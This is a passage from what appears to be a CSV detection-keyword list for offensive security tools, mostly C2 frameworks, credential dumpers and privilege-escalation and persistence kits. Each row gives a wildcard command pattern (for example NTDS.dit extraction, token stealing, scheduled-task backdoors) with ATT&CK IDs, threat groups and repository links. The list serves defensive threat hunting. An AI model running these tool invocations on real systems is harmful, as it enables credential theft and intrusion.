tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* st client wss://*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -* st teamserver *,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -O *.js*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -process64 *.exe -O *.js*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - 
TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -unhook -O *.js*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -O *.js*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -unhook -O *.js*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* start covenant*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -* start_campaign.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,0,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -* 
start_hidden_process*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* StayKit.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,0,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -* steal_token /process:* /command:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - 
T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -* stop covenant*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -* striker.py*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* stun-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* stun-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* stuxnet-detect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* supermicro-ipmi-conf.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Supershell.tar.gz*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -* -sV --script vulners *,offensive_tool_keyword,nmap,Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Network Exploitation tools,https://nmap.org/book/nse-usage.html,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* svn-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* SW2_HashSyscall*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* SweetPotato by @_EthicalChaos*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,0,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -* --syscalls GetSyscallStub*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -syscalls -sleep=*.exe*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* --syscalls SysWhispers3*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -system SYSTEM -ntds NTDS.dit LOCAL*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -system SYSTEM -ntds NTDS.dit -outputfile*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* --syswhispers --jump*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* SysWhispers*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,0,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -* -t *https://autodiscover.*/autodiscover/autodiscover.xml*autodiscover*,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,0,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z -* -t 127.0.0.1 -p 1337 *,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,0,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -* -t BindShell -p *pwned\pipe\spoolss*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -* -t C2concealer *,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,0,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -* -t CreateProcessAsUserW -p *pwned\pipe\spoolss* -e 
*.exe*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -* -t dcsync://* -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -t donut *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* -t pe2sh*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* -t schtaskbackdoor *,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -* -Target * -AllDomain *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -Target * -InitialGrooms *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -Target * -Shellcode *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --target=* --payload=*cmd.exe /c*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,0,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -* -target-domain * -outputfile * -no-pass*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* targetedKerberoast.py *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --target-name * --domain * --dc-ip * --executable *.exe*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,0,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -* targets-asn.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* targets-ipv6-map4to6.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
